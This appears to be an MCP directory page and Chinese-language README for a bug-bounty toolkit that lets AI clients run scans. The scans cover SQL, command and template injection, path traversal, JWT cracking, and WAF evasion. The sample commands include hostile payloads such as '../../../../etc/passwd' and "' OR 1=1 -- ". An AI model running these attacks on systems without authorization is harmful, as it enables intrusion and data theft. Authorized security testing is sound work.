Xuanmu-BugBounty-mcp
Xuanmu-BugBounty-mcp is a self-contained, zero-dependency MCP toolkit for bug bounty hunting and SRC vulnerability testing, covering the full lifecycle from reconnaissance to report generation with built-in anti-blocking and WAF protection strategies.
Reconnaissance
bb_ping— TCP + HTTP dual-mode target liveness detectionbb_port_scan— TCP port scanning with Top100 or custom rangesbb_subdomain— DNS-based subdomain enumeration with custom wordlistsbb_fingerprint— Web technology stack, CMS, and WAF fingerprintingbb_dir_scan— Directory/file brute-forcing with 150+ built-in sensitive paths
Vulnerability Detection
bb_sqli— SQL injection (error-based, boolean, time-blind)bb_nosqli— NoSQL injection detectionbb_xss— Reflected XSS across multiple contextsbb_ssti— SSTI for Jinja2, Twig, FreeMarker, Velocity, ERB, Smartybb_cmdi— Command injection via time-blind and output-echobb_ssrf— SSRF with internal network probing and OOB hintsbb_cors— CORS misconfiguration testingbb_open_redirect— Open redirect detection with parameter scanningbb_file_upload— File upload bypass (extension, MIME, double extension, .htaccess, SVG)bb_csrf— CSRF detection via token analysis, SameSite, Referer/Origin checksbb_xxe— XXE detection (classic, blind OOB, XInclude, SVG)bb_lfi— LFI/path traversal with PHP filter testsbb_host_inject— Host header injection with 9 attack scenariosbb_takeover— Subdomain takeover via CNAME + 50+ cloud service matchingbb_race— Race condition testing with concurrent requests and response diff analysis
Authentication & JWT Security
bb_jwt_decode— Decode JWT header/payload without signature verificationbb_jwt_analyze— Full JWT security analysis with vulnerability detection and attack suggestionsbb_jwt_crack— HMAC key brute-force with built-in or custom wordlistsbb_jwt_attack— JWT attacks: None algorithm, KID injection, RS256→HS256 confusionbb_graphql— GraphQL scanning: introspection, batch queries, deep recursion, schema extraction
Information Extraction
bb_extract— Extract URLs and API endpoints from HTML and JSbb_secrets— Sensitive data detection with 20+ regex patterns (keys, tokens, passwords, internal IPs)bb_headers— Security header audit with scoring and remediation advicebb_param_discover— Auto parameter discovery from forms, queries, JSON fields, and JS variablesbb_js_analyze— JavaScript file analysis
Utilities
bb_send— Custom HTTP request sender with custom methods, headers, and bodybb_payload— Payload factory for XSS/SQLi/SSTI/SSRF and more, with encoding variantsbb_oob— OOB callback payload generator for blind SSRF/XXE/RCE verificationbb_idor— IDOR testingbb_cloud_check— Cloud service security checkingbb_waf_check— WAF identificationbb_session— Multi-step session handlingbb_report— Generate structured SRC-format Markdown vulnerability reports
All network tools support Bearer Token and Cookie authentication, proxy configuration, request timeouts, User-Agent rotation, and WAF protection modes (safe/aggressive) with retry logic and circuit breakers.
Provides tools for scanning GraphQL endpoints, including introspection, batch queries, and recursive queries to detect vulnerabilities.
Click on "Install Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@Xuanmu-BugBounty-mcpcheck if example.com is vulnerable to SQL injection"
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
🎯 Xuanmu-BugBounty-mcp
玄幕安全团队 · guaidao2 开发
独立自包含的 SRC 挖洞专用 MCP 工具包 — 零外部依赖,即装即用
📦 快速安装
# 1. 克隆仓库
git clone https://github.com/guaidao2/Xuanmu-Bugbounty-mcp.git
cd Xuanmu-BugBounty-mcp
# 2. 安装依赖(使用清华源)
pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple
# 3. 启动 MCP 服务器(stdio 模式)
# 方式一:直接启动(推荐)
xuanmu-bb
# 方式二:使用 python + 脚本绝对路径启动
python "绝对路径/src/xuanmu_bb/server.py"Related MCP server: Bug Bounty MCP Server
🔌 MCP 配置
在支持 MCP 的客户端(如 Claude Desktop、Cursor、Windsurf 等)中配置:
方式一:使用 xuanmu-bb 命令(推荐)
{
"mcpServers": {
"Xuanmu-BugBounty-mcp": {
"command": "xuanmu-bb",
"args": []
}
}
}方式二:使用 python + 脚本文件绝对路径调用
{
"mcpServers": {
"Xuanmu-BugBounty-mcp": {
"command": "python",
"args": ["你的项目绝对路径/src/xuanmu_bb/server.py"]
}
}
}💡 将
你的项目绝对路径替换为你实际存放项目的完整路径 Windows 示例:"D:\\Projects\\Xuanmu-BugBounty-mcp\\src\\xuanmu_bb\\server.py"
🔐 认证方式(两种都支持)
目标需要登录?所有 HTTP 工具都支持两种认证:
方式 | 参数 | 适用场景 |
Bearer Token |
| JWT / OAuth2 令牌登录的系统 |
Session Cookie |
| 表单登录 / PHP/Java Session 的系统 |
# Bearer Token(API 认证)
bb_sqli url="https://target.com/api/search" params="q" auth_token="eyJhbGciOiJIUzI1NiIs..."
# Session Cookie(Web 认证)
bb_xss url="https://target.com/search" params="q" cookie="JSESSIONID=ABCD1234"
# 先探测认证状态
bb_param_discover url="https://target.com"
# 输出会标注: [AUTH: required] HTTP 401 或 [AUTH: none] HTTP 200🧰 全部 39 个工具
🔍 侦察模块 (Reconnaissance)
工具 | 功能 | 参数 |
| 存活探测 — TCP + HTTP 双重检测 | target, timeout, proxy |
| 端口扫描 — Top100/自定义范围 | target, ports, timeout, concurrent |
| 子域名枚举 — DNS 批量解析 | domain, wordlist, concurrent |
| Web 指纹识别 — 技术栈/CMS/WAF | url, proxy, cookie, auth_token |
| 目录爆破 — 内置 150+ 敏感路径 | url, wordlist, status_filter, concurrent, cookie, auth_token |
🔥 漏洞检测模块 (Vulnerability Detection)
工具 | 功能 | 参数 |
| SQL 注入 — 报错/布尔/时间盲注 | url, params, method, body, auth_token, cookie, waf_mode |
| NoSQL 注入 — MongoDB $ne/$gt/$regex | url, params, method, body, auth_token, cookie |
| XSS 检测 — 反射型/多种上下文 | url, params, method, body, auth_token, cookie, waf_mode |
| SSTI 模板注入 — 多引擎检测 | url, params, method, body, auth_token, cookie, waf_mode |
| 命令注入 — 时间盲注+输出回显 | url, params, method, body, auth_token, cookie, waf_mode |
| SSRF 检测 — 内网/云元数据/OOB | url, params, method, body, auth_token, cookie, waf_mode |
| CORS 跨域 — 12 种 Origin 测试 | url, auth_token, cookie |
| 开放重定向 — 参数扫描+跳转测试 | url, params, auth_token, cookie |
| 文件上传绕过 — 实际上传+验证可访问 | url, auth_token, cookie |
| CSRF 检测 — Token/SameSite/Referer | url, auth_token, cookie |
| XXE 检测 — 经典/Blind/SVG/XInclude | url, body, auth_token, cookie |
| 路径遍历 — ../遍历/PHP filter | url, params, method, body, auth_token, cookie, waf_mode |
| Host 头注入 — 9 种攻击场景 | url, auth_token, cookie |
| 子域名接管 — CNAME+50+云服务匹配 | domain, auth_token |
| 条件竞争 — 并发请求+响应差异分析 | url, method, data/body, concurrent, auth_token, cookie |
🔐 认证安全模块 (Authentication Security)
工具 | 功能 | 参数 |
| JWT 解码 — 解析 Header/Payload | token |
| JWT 安全分析 — 漏洞检测+攻击建议 | token |
| JWT 密钥爆破 — HMAC 字典攻击 | token, wordlist |
| JWT 攻击 — None/KID注入/算法混淆 | token, mode, payload_override, public_key |
| GraphQL 扫描 — Introspection/批量/递归 | url, auth_token, cookie |
📋 信息提取模块 (Information Extraction)
工具 | 功能 | 参数 |
| URL/Endpoint 提取 — HTML+JS分析 | url, depth, auth_token, cookie |
| 敏感信息检测 — 20 种正则模式 | url, auth_token, cookie, check_js |
| 安全头审计 — 8 项评分+修复建议 | url, auth_token, cookie |
| 参数自动发现 — 提取表单/查询/JSON/JS | url, depth, auth_token, cookie |
| JS 深度分析 — API路由/Sourcemap/硬编码/SPA/WebSocket | url, auth_token, cookie |
🧰 工具模块 (Utilities)
工具 | 功能 | 参数 |
| 手工 HTTP 发包 — 自定义方法/头/Body | url, method, headers, body, auth_token, cookie |
| Payload 工厂 — 9 类漏洞×6 种编码 | vuln_type, encode, count |
| OOB 外带辅助 — 生成回调标识/Payload | mode, callback_url |
| IDOR 越权检测 — 双 Token 对比 + 序号枚举 | url, token_owner, token_attacker, method, param |
| 云服务安全 — S3/元数据/云配置泄露 | url, auth_token, cookie |
| WAF 指纹识别 — 14 种 WAF + 绕过建议 | url, auth_token, cookie |
| 多步骤流程 — Session保持 + 请求链 | steps (JSON), proxy |
| 漏洞报告生成 — SRC 格式 Markdown | vuln_type, target, param, payload, impact |
🚀 使用示例
# 侦察一个目标
bb_ping target="example.com"
bb_port_scan target="example.com" ports="80,443,8080-8090"
bb_subdomain domain="example.com"
bb_fingerprint url="https://example.com"
bb_dir_scan url="https://example.com"
# 漏洞检测
bb_sqli url="https://example.com/page?id=1" params="id"
bb_xss url="https://example.com/search?q=test" params="q"
bb_ssti url="https://example.com/welcome?name=test" params="name"
bb_cmdi url="https://example.com/ping?host=127.0.0.1" params="host"
bb_ssrf url="https://example.com/fetch?url=http://example.com" params="url"
bb_cors url="https://api.example.com/data"
bb_open_redirect url="https://example.com/redirect?url=https://example.com"
bb_csrf url="https://example.com/change_password"
bb_xxe url="https://example.com/xml/parse"
bb_lfi url="https://example.com/file?name=test.txt" params="name"
bb_host_inject url="https://example.com/reset"
bb_takeover domain="sub.example.com"
bb_race url="https://example.com/api/coupon/claim" method="POST"
# JWT 工具
bb_jwt_decode token="eyJhbGciOiJIUzI1NiIs..."
bb_jwt_analyze token="eyJhbGciOiJIUzI1NiIs..."
bb_jwt_crack token="eyJhbGciOiJIUzI1NiIs..."
bb_jwt_attack token="eyJhbGciOiJIUzI1NiIs..." mode="none"
# GraphQL
bb_graphql url="https://example.com/graphql"
# 信息提取
bb_extract url="https://example.com" depth=2
bb_secrets url="https://example.com" check_js=true
bb_headers url="https://example.com"
# POST body 注入(新增)
bb_sqli url="https://target.com/api/login" method="POST" body="username=admin&password=test" params="username"
bb_xss url="https://target.com/api/feedback" method="POST" body="message=test" params="message"
bb_cmdi url="https://target.com/api/ping" method="POST" body="host=127.0.0.1" params="host"
bb_xxe url="https://target.com/xml/parse" body="<?xml version='1.0'?><root>test</root>"
bb_lfi url="https://target.com/api/read" method="POST" body="file=../../../../etc/passwd" params="file"
bb_ssti url="https://target.com/welcome" method="POST" body="name={{7*7}}" params="name"
# 工具
bb_payload vuln_type="xss" encode="all" count=20
bb_send url="https://example.com/api/login" method="POST" headers='{"Content-Type": "application/json"}' body='{"user":"admin","pass":"123"}'
bb_report vuln_type="sqli" target="https://example.com/page?id=1" payload="\' OR 1=1 -- "
bb_send url="https://example.com/api/login" method="POST" headers='{"Content-Type": "application/json"}' body='{"user":"admin","pass":"123"}'
bb_report vuln_type="sqli" target="https://example.com/page?id=1" payload="' OR 1=1 -- "
# JS 深度分析
bb_js_analyze url="https://example.com" auth_token="..."
# WAF 检测
bb_waf_check url="https://example.com"
# IDOR 越权检测
bb_idor url="https://api.example.com/users/1234" \
token_owner="eyJ...owner_token..." \
token_attacker="eyJ...attacker_token..."
# 多步骤流程
bb_session steps='[
{"method":"POST","url":"https://target.com/login","body":"user=admin&pass=test"},
{"method":"GET","url":"https://target.com/api/profile"}
]'
# 云服务检测
bb_cloud_check url="https://example.com"
# 参数自动发现 + NoSQL 注入
bb_param_discover url="https://example.com/api"
bb_nosqli url="https://example.com/api/user?id=1"🛡️ WAF 防护引擎
支持 WAF 检测的扫描工具(sqli/xss/ssti/cmdi/ssrf/lfi/dir_scan)自动集成:
参数 | 默认值 | 说明 |
|
|
|
|
| 被拦截后重试次数,超限自动熔断 |
|
|
|
工作流程:
1. 预检 — 发无害请求检测 WAF 指纹
2. 发现 WAF → 自动降速 + 轮换 UA + 提示绕过建议
3. 扫描中 — 实时检测拦截页面 (403/503/验证页)
4. 熔断 — 连续 N 次被拦截 → 自动中断 → 输出熔断报告先检测 WAF:
bb_waf_check url="https://target.com"带 WAF 防护扫描:
bb_sqli url="https://target.com/page?id=1" waf_mode="safe" request_delay="3"🏗️ 项目结构
src/xuanmu_bb/
├── server.py # MCP 入口(38 个工具注册)
├── client.py # HTTP 客户端(代理/Cookie/UA轮换/反封策略)
├── utils.py # 公共工具函数
├── data/ # 内置数据(Payload 字典/指纹/WAF库/正则模式)
├── recon/ # 侦察模块(5 工具)
├── vuln/ # 漏洞检测模块(15 工具)
├── auth/ # 认证安全模块(5 工具)
├── extract/ # 信息提取模块(5 工具)
└── tools/ # 工具模块(9 工具)🧪 技术特点
完全自包含 — 不依赖 nmap/nuclei/burp 等外部工具,纯 Python 实现
零外部扫描器依赖 — 不依赖 yakit/tscanplus/nuclei,独立运行
内置丰富数据 — 200+ 子域字典 / 150+ 目录字典 / 1000+ 端口服务映射 / 500+ Payload
反封策略 — User-Agent 轮换 / 请求间隔控制 / 代理支持
清华源 — 默认使用
pypi.tuna.tsinghua.edu.cn加速安装覆盖 SRC 全流程 — 信息收集 → 漏洞检测 → 利用验证 → 报告生成
📝 许可证
本项目仅供合法的安全测试与漏洞挖掘使用。使用者需遵守相关法律法规。
Xuanmu-BugBounty-mcp © 2026 玄幕安全团队 · guaidao2
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Latest Blog Posts
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/guaidao2/Xuanmu-Bugbounty-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server